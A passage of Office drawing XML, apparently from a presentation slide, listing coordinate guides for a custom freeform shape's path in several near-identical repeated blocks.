              <a:gd name="connsiteX12" fmla="*/ 355319 w 1453745"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 354117 w 1453745"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 361702 w 1453745"/>
              <a:gd name="connsiteY14" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 391660 w 1453745"/>
              <a:gd name="connsiteY15" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 421458 w 1453745"/>
              <a:gd name="connsiteY16" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 435470 w 1453745"/>
              <a:gd name="connsiteY17" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 459901 w 1453745"/>
              <a:gd name="connsiteY18" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 496784 w 1453745"/>
              <a:gd name="connsiteY19" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 535165 w 1453745"/>
              <a:gd name="connsiteY20" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 541324 w 1453745"/>
              <a:gd name="connsiteY21" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 549606 w 1453745"/>
              <a:gd name="connsiteY22" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 553216 w 1453745"/>
              <a:gd name="connsiteY23" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 567082 w 1453745"/>
              <a:gd name="connsiteY24" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 569813 w 1453745"/>
              <a:gd name="connsiteY25" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 568071 w 1453745"/>
              <a:gd name="connsiteY26" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 574980 w 1453745"/>
              <a:gd name="connsiteY27" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 586239 w 1453745"/>
              <a:gd name="connsiteY28" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 592142 w 1453745"/>
              <a:gd name="connsiteY29" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 591455 w 1453745"/>
              <a:gd name="connsiteY30" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 583103 w 1453745"/>
              <a:gd name="connsiteY31" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 563756 w 1453745"/>
              <a:gd name="connsiteY32" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 565385 w 1453745"/>
              <a:gd name="connsiteY33" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 553085 w 1453745"/>
              <a:gd name="connsiteY34" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 552810 w 1453745"/>
              <a:gd name="connsiteY35" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 557109 w 1453745"/>
              <a:gd name="connsiteY36" fmla="*/ 3872886 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 567482 w 1453745"/>
              <a:gd name="connsiteY37" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 578378 w 1453745"/>
              <a:gd name="connsiteY38" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 585724 w 1453745"/>
              <a:gd name="connsiteY39" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 585020 w 1453745"/>
              <a:gd name="connsiteY40" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 588463 w 1453745"/>
              <a:gd name="connsiteY41" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 609893 w 1453745"/>
              <a:gd name="connsiteY42" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 592419 w 1453745"/>
              <a:gd name="connsiteY43" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 567827 w 1453745"/>
              <a:gd name="connsiteY44" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 553302 w 1453745"/>
              <a:gd name="connsiteY45" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 528476 w 1453745"/>
              <a:gd name="connsiteY46" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 485756 w 1453745"/>
              <a:gd name="connsiteY47" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 420008 w 1453745"/>
              <a:gd name="connsiteY48" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 390825 w 1453745"/>
              <a:gd name="connsiteY49" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 394895 w 1453745"/>
              <a:gd name="connsiteY50" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 362726 w 1453745"/>
              <a:gd name="connsiteY51" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 352613 w 1453745"/>
              <a:gd name="connsiteY52" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 336830 w 1453745"/>
              <a:gd name="connsiteY53" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 334288 w 1453745"/>
              <a:gd name="connsiteY54" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 335281 w 1453745"/>
              <a:gd name="connsiteY55" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 308265 w 1453745"/>
              <a:gd name="connsiteY56" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 284822 w 1453745"/>
              <a:gd name="connsiteY57" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 238621 w 1453745"/>
              <a:gd name="connsiteY58" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 210058 w 1453745"/>
              <a:gd name="connsiteY59" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 190853 w 1453745"/>
              <a:gd name="connsiteY60" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 196675 w 1453745"/>
              <a:gd name="connsiteY61" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 191067 w 1453745"/>
              <a:gd name="connsiteY62" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 196940 w 1453745"/>
              <a:gd name="connsiteY63" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 178528 w 1453745"/>
              <a:gd name="connsiteY64" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 167264 w 1453745"/>
              <a:gd name="connsiteY65" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 168720 w 1453745"/>
              <a:gd name="connsiteY66" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 163585 w 1453745"/>
              <a:gd name="connsiteY67" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 123723 w 1453745"/>
              <a:gd name="connsiteY68" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 120633 w 1453745"/>
              <a:gd name="connsiteY69" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 114289 w 1453745"/>
              <a:gd name="connsiteY70" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 54248 w 1453745"/>
              <a:gd name="connsiteY71" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 17683 w 1453745"/>
              <a:gd name="connsiteY72" fmla="*/ 455299 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 936 w 1453745"/>
              <a:gd name="connsiteY73" fmla="*/ 224344 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 27363 w 1453745"/>
              <a:gd name="connsiteY74" fmla="*/ 74954 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 66253 w 1453745"/>
              <a:gd name="connsiteY75" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 66253 w 1453745"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1453745 w 1453745"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1453745 w 1453745"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 190439 w 1453745"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 227032 w 1453745"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 238532 w 1453745"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 255939 w 1453745"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 267517 w 1453745"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 340360 w 1453745"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 356047 w 1453745"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 374887 w 1453745"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 362661 w 1453745"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 355319 w 1453745"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 354117 w 1453745"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 361702 w 1453745"/>
              <a:gd name="connsiteY14" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 391660 w 1453745"/>
              <a:gd name="connsiteY15" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 421458 w 1453745"/>
              <a:gd name="connsiteY16" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 435470 w 1453745"/>
              <a:gd name="connsiteY17" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 459901 w 1453745"/>
              <a:gd name="connsiteY18" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 496784 w 1453745"/>
              <a:gd name="connsiteY19" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 535165 w 1453745"/>
              <a:gd name="connsiteY20" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 541324 w 1453745"/>
              <a:gd name="connsiteY21" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 549606 w 1453745"/>
              <a:gd name="connsiteY22" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 553216 w 1453745"/>
              <a:gd name="connsiteY23" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 567082 w 1453745"/>
              <a:gd name="connsiteY24" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 569813 w 1453745"/>
              <a:gd name="connsiteY25" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 568071 w 1453745"/>
              <a:gd name="connsiteY26" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 574980 w 1453745"/>
              <a:gd name="connsiteY27" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 586239 w 1453745"/>
              <a:gd name="connsiteY28" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 592142 w 1453745"/>
              <a:gd name="connsiteY29" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 591455 w 1453745"/>
              <a:gd name="connsiteY30" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 583103 w 1453745"/>
              <a:gd name="connsiteY31" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 563756 w 1453745"/>
              <a:gd name="connsiteY32" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 565385 w 1453745"/>
              <a:gd name="connsiteY33" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 553085 w 1453745"/>
              <a:gd name="connsiteY34" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 552810 w 1453745"/>
              <a:gd name="connsiteY35" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 557109 w 1453745"/>
              <a:gd name="connsiteY36" fmla="*/ 3872886 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 567482 w 1453745"/>
              <a:gd name="connsiteY37" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 578378 w 1453745"/>
              <a:gd name="connsiteY38" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 585724 w 1453745"/>
              <a:gd name="connsiteY39" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 585020 w 1453745"/>
              <a:gd name="connsiteY40" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 588463 w 1453745"/>
              <a:gd name="connsiteY41" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 609893 w 1453745"/>
              <a:gd name="connsiteY42" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 592419 w 1453745"/>
              <a:gd name="connsiteY43" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 567827 w 1453745"/>
              <a:gd name="connsiteY44" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 553302 w 1453745"/>
              <a:gd name="connsiteY45" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 528476 w 1453745"/>
              <a:gd name="connsiteY46" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 485756 w 1453745"/>
              <a:gd name="connsiteY47" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 420008 w 1453745"/>
              <a:gd name="connsiteY48" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 390825 w 1453745"/>
              <a:gd name="connsiteY49" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 394895 w 1453745"/>
              <a:gd name="connsiteY50" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 362726 w 1453745"/>
              <a:gd name="connsiteY51" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 352613 w 1453745"/>
              <a:gd name="connsiteY52" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 336830 w 1453745"/>
              <a:gd name="connsiteY53" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 334288 w 1453745"/>
              <a:gd name="connsiteY54" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 335281 w 1453745"/>
              <a:gd name="connsiteY55" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 308265 w 1453745"/>
              <a:gd name="connsiteY56" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 284822 w 1453745"/>
              <a:gd name="connsiteY57" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 238621 w 1453745"/>
              <a:gd name="connsiteY58" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 210058 w 1453745"/>
              <a:gd name="connsiteY59" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 190853 w 1453745"/>
              <a:gd name="connsiteY60" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 196675 w 1453745"/>
              <a:gd name="connsiteY61" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 191067 w 1453745"/>
              <a:gd name="connsiteY62" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 196940 w 1453745"/>
              <a:gd name="connsiteY63" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 178528 w 1453745"/>
              <a:gd name="connsiteY64" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 167264 w 1453745"/>
              <a:gd name="connsiteY65" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 168720 w 1453745"/>
              <a:gd name="connsiteY66" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 163585 w 1453745"/>
              <a:gd name="connsiteY67" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 123723 w 1453745"/>
              <a:gd name="connsiteY68" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 120633 w 1453745"/>
              <a:gd name="connsiteY69" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 54248 w 1453745"/>
              <a:gd name="connsiteY70" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 17683 w 1453745"/>
              <a:gd name="connsiteY71" fmla="*/ 455299 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 936 w 1453745"/>
              <a:gd name="connsiteY72" fmla="*/ 224344 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 27363 w 1453745"/>
              <a:gd name="connsiteY73" fmla="*/ 74954 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 66253 w 1453745"/>
              <a:gd name="connsiteY74" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 66253 w 1453745"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1453745 w 1453745"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1453745 w 1453745"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 190439 w 1453745"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 227032 w 1453745"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 238532 w 1453745"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 255939 w 1453745"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 267517 w 1453745"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 340360 w 1453745"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 356047 w 1453745"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 374887 w 1453745"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 362661 w 1453745"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 355319 w 1453745"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 354117 w 1453745"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 361702 w 1453745"/>
              <a:gd name="connsiteY14" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 391660 w 1453745"/>
              <a:gd name="connsiteY15" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 421458 w 1453745"/>
              <a:gd name="connsiteY16" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 435470 w 1453745"/>
              <a:gd name="connsiteY17" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 459901 w 1453745"/>
              <a:gd name="connsiteY18" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 496784 w 1453745"/>
              <a:gd name="connsiteY19" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 535165 w 1453745"/>
              <a:gd name="connsiteY20" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 541324 w 1453745"/>
              <a:gd name="connsiteY21" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 549606 w 1453745"/>
              <a:gd name="connsiteY22" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 553216 w 1453745"/>
              <a:gd name="connsiteY23" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 567082 w 1453745"/>
              <a:gd name="connsiteY24" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 569813 w 1453745"/>
              <a:gd name="connsiteY25" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 568071 w 1453745"/>
              <a:gd name="connsiteY26" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 574980 w 1453745"/>
              <a:gd name="connsiteY27" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 586239 w 1453745"/>
              <a:gd name="connsiteY28" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 592142 w 1453745"/>
              <a:gd name="connsiteY29" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 591455 w 1453745"/>
              <a:gd name="connsiteY30" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 583103 w 1453745"/>
              <a:gd name="connsiteY31" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 563756 w 1453745"/>
              <a:gd name="connsiteY32" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 565385 w 1453745"/>
              <a:gd name="connsiteY33" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 553085 w 1453745"/>
              <a:gd name="connsiteY34" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 552810 w 1453745"/>
              <a:gd name="connsiteY35" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 557109 w 1453745"/>
              <a:gd name="connsiteY36" fmla="*/ 3872886 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 567482 w 1453745"/>
              <a:gd name="connsiteY37" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 578378 w 1453745"/>
              <a:gd name="connsiteY38" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 585724 w 1453745"/>
              <a:gd name="connsiteY39" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 585020 w 1453745"/>
              <a:gd name="connsiteY40" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 588463 w 1453745"/>
              <a:gd name="connsiteY41" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 609893 w 1453745"/>
              <a:gd name="connsiteY42" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 592419 w 1453745"/>
              <a:gd name="connsiteY43" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 567827 w 1453745"/>
              <a:gd name="connsiteY44" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 553302 w 1453745"/>
              <a:gd name="connsiteY45" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 528476 w 1453745"/>
              <a:gd name="connsiteY46" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 485756 w 1453745"/>
              <a:gd name="connsiteY47" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 420008 w 1453745"/>
              <a:gd name="connsiteY48" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 390825 w 1453745"/>
              <a:gd name="connsiteY49" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 394895 w 1453745"/>
              <a:gd name="connsiteY50" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 362726 w 1453745"/>
              <a:gd name="connsiteY51" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 352613 w 1453745"/>
              <a:gd name="connsiteY52" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 336830 w 1453745"/>
              <a:gd name="connsiteY53" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 334288 w 1453745"/>
              <a:gd name="connsiteY54" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 335281 w 1453745"/>
              <a:gd name="connsiteY55" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 308265 w 1453745"/>
              <a:gd name="connsiteY56" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 284822 w 1453745"/>
              <a:gd name="connsiteY57" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 238621 w 1453745"/>
              <a:gd name="connsiteY58" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 210058 w 1453745"/>
              <a:gd name="connsiteY59" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 190853 w 1453745"/>
              <a:gd name="connsiteY60" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 196675 w 1453745"/>
              <a:gd name="connsiteY61" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 191067 w 1453745"/>
              <a:gd name="connsiteY62" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 196940 w 1453745"/>
              <a:gd name="connsiteY63" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 178528 w 1453745"/>
              <a:gd name="connsiteY64" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 167264 w 1453745"/>
              <a:gd name="connsiteY65" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 168720 w 1453745"/>
              <a:gd name="connsiteY66" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 163585 w 1453745"/>
              <a:gd name="connsiteY67" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 123723 w 1453745"/>
              <a:gd name="connsiteY68" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 54248 w 1453745"/>
              <a:gd name="connsiteY69" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 17683 w 1453745"/>
              <a:gd name="connsiteY70" fmla="*/ 455299 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 936 w 1453745"/>
              <a:gd name="connsiteY71" fmla="*/ 224344 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 27363 w 1453745"/>
